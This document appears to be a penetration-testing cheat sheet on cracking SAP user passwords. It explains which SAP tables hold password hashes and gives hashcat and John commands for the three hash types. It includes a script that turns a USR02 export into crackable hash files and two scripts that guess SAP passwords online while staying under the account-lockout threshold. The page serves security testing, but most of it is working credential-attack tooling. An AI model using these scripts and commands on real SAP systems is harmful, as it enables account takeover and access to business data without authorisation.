SAP – ERP Software

SAP is a German software company that develops enterprise software to manage business operations and customer relations. SAP is best known for its ERP (Enterprise Resource Planning) software, which integrates business functions such as finance, human resources, procurement and manufacturing into a unified system.

Users & Passwords

The passwords of all SAP users are stored as hash values (not reversibly encrypted) in transparent tables on the database. These tables are:

  • USR02: Contains the current user master record (logon data, kernel-side use) including the hash value(s) of the active password. USR02 is a standard SAP table available in all R/3 and NetWeaver ABAP systems; which hash columns are populated depends on the release and on the password configuration.
  • USH02: Contains the change documents for the user master records including the hash value(s) of former SAP passwords
  • USRPWDHISTORY: Contains the user password history of every user
  • USH02_ARC_TMP: Used temporarily during archiving of user change documents

Bruteforce password

If you get access to the USR02 table, extract the username (column BNAME) together with the hash columns BCODE, PASSCODE and PWDSALTEDHASH. The CODVN column tells you which code version the user currently logs in with (B, F/G or H); the older hash columns may still be populated alongside the current one.

SAP CODVN B (BCODE)

💡 BCODE is faster to crack than PASSCODE (SHA1, 160 Bit).
💡 BCODE is always UPPERCASE!
💡 BCODE is truncated to 8 characters.
The current password hash (PWDSALTEDHASH) is case sensitive and covers the full password, so the real password may contain lowercase letters and be longer than 8 characters.

Hash format for Hashcat (-m 7700) and John (--format=sapb) is “<BNAME>$<BCODE>”; the username acts as the salt, so the hash cannot be cracked without it. When the Central User Administration (CUA) module is installed (deprecated), BCODE is required. BCODE is kept alongside the newer hashes when the SAP parameter “login/password_downwards_compatibility” is NOT 0 (levels 1 to 5 keep a downward-compatible hash).

❗ You need to replace “USER” in the hash file by the real username found in the table (BNAME) or the password will NOT be cracked.

USER$C8B48F26B87B7EA7

Example mask for exactly 8 characters, excluding lowercase since BCODE is always uppercase. Because BCODE is truncated, a mask of 8 positions also covers the first 8 characters of longer passwords; add --increment to the command to try shorter passwords as well.

hashcat -m 7700 -a 3 $HASH -1 ?u?d?s ?1?1?1?1?1?1?1?1

SAP CODVN F/G (PASSCODE)

Hash format for Hashcat (-m 7800) and John (--format=sapg) is “<BNAME>$<PASSCODE>”. PASSCODE is case sensitive (unlike BCODE) and, being SHA-1 based, is slower to crack than BCODE.

❗ You need to replace “USER” in the hash file by the real username found in the table (BNAME) or the password will NOT be cracked.

USER$ABCAD719B17E7F794DF7E686E563E9E2D24DE1D0

If you cracked BCODE (uppercase, first 8 characters only), feed the results as a wordlist against PASSCODE to recover the real case of the password, letting a toggle rule flip the case of individual characters:

hashcat -m 7800 hash-passcode.txt bcode-password.txt -r /usr/share/hashcat/rules/toggles5.rule

toggles5.rule flips the case of up to 5 positions per candidate. If the real password is longer than 8 characters this attack will not find it, since the BCODE result only holds the first 8 characters; append the missing characters with a mask in a hybrid attack (-a 6, wordlist + mask).

SAP CODVN H (PWDSALTEDHASH) iSSHA-1

Hash format for Hashcat (-m 10300) and John (--format=saph) is “<PWDSALTEDHASH>” (do NOT include the username BNAME: the salt is stored inside the hash string). PWDSALTEDHASH is case sensitive (unlike BCODE). The prefix “{x-issha, 1024}” names the algorithm (iterated salted SHA-1) and the iteration count, which is why this is the slowest of the three to crack.

{x-issha, 1024}BnjXMqcNTwa3BzdnUOf1iAu6dw02NzU4MzE2MTA=
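The extraction step described above and the three hash formats in one script, as an added example that is not part of the original page: it reads a USR02 export and writes one hashcat-ready file per mode (7700, 7800, 10300), filling in BNAME where the format needs it and leaving it out for PWDSALTEDHASH. It assumes a tab-separated export with the columns BNAME, CODVN, BCODE, PASSCODE and PWDSALTEDHASH, as produced by downloading the table from SE16; the sample rows are constructed (the USER row reuses the three example hashes from this page, the other hash values and the “{x-isSHA256, …}” tag of the SHA-256 variant are placeholders, not real data).

```python
#!/usr/bin/python3
# Added example (not from the original page): turn a USR02 export into hash
# files for hashcat/john, one per code version (CODVN B, F/G and H).
# Assumes a tab-separated export with the columns BNAME, CODVN, BCODE,
# PASSCODE and PWDSALTEDHASH (SE16 download). The rows below are constructed.
import csv
import io

# Constructed sample export. All-zero BCODE/PASSCODE values are the
# placeholders SAP stores when no hash of that kind exists for the user.
USR02_EXPORT = (
    "BNAME\tCODVN\tBCODE\tPASSCODE\tPWDSALTEDHASH\n"
    # CODVN H, but downward-compatible hashes still present
    # (login/password_downwards_compatibility != 0)
    "USER\tH\tC8B48F26B87B7EA7\tABCAD719B17E7F794DF7E686E563E9E2D24DE1D0\t"
    "{x-issha, 1024}BnjXMqcNTwa3BzdnUOf1iAu6dw02NzU4MzE2MTA=\n"
    # old user, never logged in since the upgrade: only BCODE available (constructed value)
    "OLDUSER\tB\t0123456789ABCDEF\t0000000000000000000000000000000000000000\t\n"
    # CODVN H only, downward compatibility switched off (constructed value)
    "SAP*\tH\t0000000000000000\t0000000000000000000000000000000000000000\t"
    "{x-issha, 1024}Q29uc3RydWN0ZWRTYW1wbGVIYXNoMTIzNDU2Nzg=\n"
    # SHA-256 variant selected via login/password_hash_algorithm: hashcat -m 10300
    # only handles iSSHA-1 (tag string assumed for this constructed row)
    "ADMIN\tH\t0000000000000000\t0000000000000000000000000000000000000000\t"
    "{x-isSHA256, 15000}Q29uc3RydWN0ZWRTYW1wbGVIYXNoMTIzNDU2Nzg=\n"
)

# CODVN (code version) -> hashcat mode of the hash the user currently logs in with
HASHCAT_MODE = {"B": "7700", "F": "7800", "G": "7800", "H": "10300"}


def is_absent(value):
    """Empty field or SAP's all-zero placeholder: no hash of this kind stored."""
    value = value.strip()
    return value == "" or set(value) == {"0"}


def extract_hashes(export_text):
    """Parse the export and return hashcat-ready lines grouped by mode.

    'unsupported' collects PWDSALTEDHASH values that are not iSSHA-1,
    'current' maps each BNAME to the mode of its active hash (from CODVN).
    """
    lines = {"7700": [], "7800": [], "10300": [], "unsupported": [], "current": {}}
    reader = csv.DictReader(io.StringIO(export_text), delimiter="\t")
    for row in reader:
        bname = row["BNAME"].strip()
        bcode = row["BCODE"].strip()
        passcode = row["PASSCODE"].strip()
        salted = row["PWDSALTEDHASH"].strip()
        lines["current"][bname] = HASHCAT_MODE.get(row["CODVN"].strip().upper())
        # modes 7700/7800 use the username as salt: <BNAME>$<hash>
        if not is_absent(bcode):
            lines["7700"].append(f"{bname}${bcode}")
        if not is_absent(passcode):
            lines["7800"].append(f"{bname}${passcode}")
        # mode 10300 takes the PWDSALTEDHASH string alone, without BNAME
        if salted.startswith("{x-issha,"):
            lines["10300"].append(salted)
        elif salted:
            lines["unsupported"].append(f"{bname}: {salted}")
    return lines


def write_hash_files(lines, prefix="usr02"):
    """Write one file per mode (usr02-7700.txt, ...) and return the file names."""
    names = []
    for mode in ("7700", "7800", "10300"):
        if lines[mode]:
            name = f"{prefix}-{mode}.txt"
            with open(name, "w") as fh:
                fh.write("\n".join(lines[mode]) + "\n")
            names.append(name)
    return names


if __name__ == "__main__":
    result = extract_hashes(USR02_EXPORT)
    for mode in ("7700", "7800", "10300"):
        print(f"hashcat -m {mode}: {len(result[mode])} hash(es)")
    for bname, mode in result["current"].items():
        print(f"{bname}: active hash is cracked with -m {mode}")
    for entry in result["unsupported"]:
        print("not crackable with -m 10300:", entry)
    print("written:", write_hash_files(result))
```

Crack the cheap hashes first: a user whose BCODE is still present gives you the uppercase, 8-character prefix of the password even when CODVN says H, which is exactly the downward-compatibility weakness the parameter above controls.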

Automation using Netweaver SDK and pyrfc

Both scripts below guess passwords online against the server. Each failed logon counts towards the user's lock counter: after “login/fails_to_user_lock” consecutive failures (default 5) the user is locked, and stays locked until an administrator unlocks it unless “login/failed_user_auto_unlock” is set. Keep the number of guesses per user below that threshold, and prefer the offline cracking above whenever you have the hashes.

#!/usr/bin/python3
#---------------------------------------------------------------------
# Author      : Lisandre.com
# Prereq      : Install SAP NW RFC SDK, download from SAP support portal
#               pip install pyrfc
#---------------------------------------------------------------------
import time
from pyrfc import Connection

# CONFIGURATIONS, UPDATE THIS SECTION, LOOK UPPER RIGHT CORNER IN SAP FOR SID & MANDANT
sap_sid = "P01"     # 3 characters, uppercase, unique ID for a server (not needed for an RFC logon, kept for reference)
sap_mandant = "123" # client number
server = "sap.example.com"
instance = "01"     # system number: the RFC gateway listens on port 33<instance>

#---------------------------------------------------------------------
# Login to SAP using credentials provided.
# Returns True when the RFC logon succeeds, False otherwise.
#---------------------------------------------------------------------
def login(username, password):
    try:
        conn = Connection(user=username, passwd=password, ashost=server, sysnr=instance, client=sap_mandant)
        conn.close()
        print("[+] valid: %s / %s" % (username, password))
        return True
    except Exception as e:
        # pyrfc raises LogonError for a wrong password or locked user and
        # CommunicationError when the gateway is unreachable; both end here
        print("[-] %s: %s" % (username, e))
        return False
    finally:
        time.sleep(2) # pause between attempts

#---------------------------------------------------------------------
# Log in
#---------------------------------------------------------------------
login("test", "test")

Automation using SAP GUI

#!/usr/bin/python3
#---------------------------------------------------------------------
# Author      : Lisandre.com
# Prereq      : SAP GUI installed, with scripting enabled
#               pip install pywin32
#---------------------------------------------------------------------
import subprocess
import time
import win32com.client

# CONFIGURATIONS, UPDATE THIS SECTION, LOOK UPPER RIGHT CORNER IN SAP FOR SID & MANDANT
sap_sid = "P01" # 3 characters, uppercase, unique ID for a server
sap_mandant = "123"
# raw string: the backslashes of a Windows path must not be read as escape sequences
sap_exe = r"C:\Program Files (x86)\...\sapshcut.exe"

#---------------------------------------------------------------------
# Login to SAP using credentials provided.
# sapshcut opens a new SAP GUI session; the status bar of that session
# is then read through SAP GUI Scripting to see whether the logon was
# accepted (a wrong password leaves an error message there).
#---------------------------------------------------------------------
def login(username, password):
    try:
        # check=True makes a non-zero exit code raise CalledProcessError
        subprocess.run([sap_exe, '-system=' + sap_sid, '-client=' + sap_mandant,
                        '-user=' + username, '-pw=' + password], check=True)
        time.sleep(2) # give the new session time to appear
    except subprocess.CalledProcessError as error:
        print(error)
        return None
    engine = win32com.client.GetObject("SAPGUI").GetScriptingEngine
    connection = engine.Children(engine.Children.Count - 1) # newest connection
    session = connection.Children(0)
    status = session.findById("wnd[0]/sbar").Text
    print("%s -> %s" % (username, status or "logged in, no status message"))
    return status

#---------------------------------------------------------------------
# Log in
#---------------------------------------------------------------------
login("test", "test")